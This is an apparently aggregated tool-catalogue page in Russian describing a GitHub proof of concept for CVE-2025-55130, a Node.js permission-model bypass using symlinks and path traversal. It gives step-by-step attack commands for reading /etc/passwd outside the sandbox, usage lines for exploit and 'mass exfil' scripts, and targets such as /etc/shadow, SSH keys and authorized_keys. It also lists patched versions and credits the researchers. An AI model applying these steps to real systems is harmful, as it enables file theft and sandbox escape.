Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55130 — POC for CVE-2025-55130 | Kitploit
Инструменты/GitHubGitHub/scumfrog/cve-2025-55130
Privilege EscalationVulnerability AnalysisExploitationData ExfiltrationWeb SecurityContainer Escape
GitHubscumfrog/cve-2025-55130

CVE-2025-55130

POC for CVE-2025-55130

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55130 - Обход модели разрешений Node.js через символические ссылки

root@kitploit:~
   ___ _   _ ___     ____   ___ ____  ____      ____ ____ _ _____ ___  
  / __| | | | __|___/ _  \ / _ \___ \| ___|    | ___| ___/ |___ // _ \ 
 | (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
  \___|\___/|___|   \__  ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
                    |___/                       |____/____/|_|____/\___/ 
                                                                        
        Обход модели разрешений Node.js через поддельные символические ссылки
                   [ Обнаружено: natann @ JFrog ]

Обзор

Уязвимость обхода пути в Node.js позволяет обойти ограничения разрешений --allow-fs-read и --allow-fs-write с помощью символических ссылок, указывающих на абсолютные пути, в сочетании с относительным обходом.

Проверка разрешений и разрешение пути выполняются отдельно. Как только начальный путь проходит проверку разрешений, символическая ссылка обрабатывается, и последовательности обхода покидают песочницу.

Затронутые версии

ВеткаУязвимая

Технический анализ

Коренная причина

root@kitploit:~
Permission Check:  ./nested/dirs/symlink/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^ ALLOWED (starts with ./)
                   
Path Resolution:   /actual/path/to/script/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
                   Resolves to /etc/passwd - OUTSIDE SANDBOX

Модель разрешений проверяет строку пути до разрешения символической ссылки. Создавая символическую ссылку на абсолютный путь и используя обход ../ ПОСЛЕ символической ссылки, мы выходим за пределы разрешённой директории.

Схема атаки

root@kitploit:~
1. mkdir -p ./a/b/c/d/e/f/g           # Create nested dirs in allowed path
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x     # Symlink to absolute path  
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
         ^^^^^^^^^^^^^^^^^ 
         Permission check passes (inside ./)
         
   After symlink resolution:
   /home/user/project/../../../etc/passwd -> /etc/passwd
   ^^^^^^^^^^^^^^^^^^^^
   Traversal escapes to root

Файлы

ФайлНазначение
exploit.jsОсновной эксплойт - чтение произвольных файлов
exploit_write.jsЗапись произвольных файлов

Использование

root@kitploit:~
# Basic exploitation
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js

# Check if vulnerable
node check.js

# Mass exfil
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js

Воздействие

  • Чтение конфиденциальных файлов: /etc/passwd, /etc/shadow, SSH-ключи, конфиги
  • Запись произвольных файлов: cron-задачи, authorized_keys, конфиги
  • Побег из контейнера в мультитенантных средах
  • Обход песочницы для выполнения недоверенного кода

Ссылки

  • https://research.jfrog.com/vulnerabilities/nodejs-fs-permissions-bypass-cve-2025-55130/
  • https://nodejs.org/en/blog/vulnerability/december-2025-security-releases
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55130

Благодарности

  • Уязвимость: Натан Нехорай (natann) @ JFrog Security Research
  • Исправление: RafaelGSS @ Node.js

Только для исследований и авторизованного тестирования.

Скачать инструмент
Исправленная
20.x< 20.20.020.20.0
22.x< 22.22.022.22.0
24.x< 24.13.024.13.0
25.x< 25.3.025.3.0
exfil.jsМассовая кража файлов
check.jsПроверка уязвимости версии